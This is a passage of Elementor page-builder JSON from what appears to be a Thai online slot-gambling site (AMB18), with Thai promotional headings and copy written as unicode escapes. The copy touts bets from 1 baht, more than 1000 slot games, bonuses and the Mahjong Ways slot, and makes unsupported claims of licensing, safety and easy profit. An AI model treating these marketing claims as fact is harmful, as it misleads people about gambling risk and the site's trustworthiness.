0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 